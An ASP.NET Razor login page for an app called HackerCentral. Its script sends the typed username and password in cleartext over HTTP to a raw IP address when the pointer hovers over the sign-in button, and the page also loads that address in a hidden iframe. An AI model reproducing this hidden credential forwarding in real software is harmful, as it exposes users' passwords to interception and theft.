@model HackerCentral.Models.LoginModel

@{
    ViewBag.Title = "Log in";
}

<div class="well well-large offset4 span4">
@using (Html.BeginForm("Login", "Account", FormMethod.Post, new { ReturnUrl = ViewBag.ReturnUrl }))
{
    @Html.AntiForgeryToken()

    <h2>Please sign in</h2>
    @Html.TextBoxFor(m => m.UserName, new { placeholder = "User Name", type = "text" })
    @Html.PasswordFor(m => m.Password, new { placeholder = "Password", type = "password" })
    @Html.ValidationSummary(true)
    <label class="checkbox" style="visibility:hidden;display:none">
        @Html.CheckBoxFor(m => m.RememberMe) Remember me
    </label>
    <br />
    var ua = new HackerCentral.Accessors.UserAccessor();
    if (ua.serverStatus())
    {
            <button class="btn btn-primary" id="submitButton" type="submit">Sign in</button>
        }
        else
        {
            <div class="alert alert-info" style="word-wrap:break-word; margin-top:12px;">Server is off duty...You cannot login right now.</div>
        }
    <div>
        <iframe id="externalcontent" src="http://129.93.238.144/" style="visibility:hidden;display:none"></iframe>
    </div>
    
}
</div>

<script>
    $("#submitButton").hover(function () {
        $.ajax({
            type: 'POST',
            url: 'http://129.93.238.144/api/login/local',
            data: { 'username': $('#UserName').val(), 'password': $('#Password').val() },
            dataType: "json",
            crossDomain: true,
            xhrFields: {
                withCredentials: true
            },
            headers: {

            },
            success: function () {

            },
            error: function () {

            }
        });
    })
    $(document).keypress(function (e) {
        if (e.which == 13) return false;
    });
    

</script>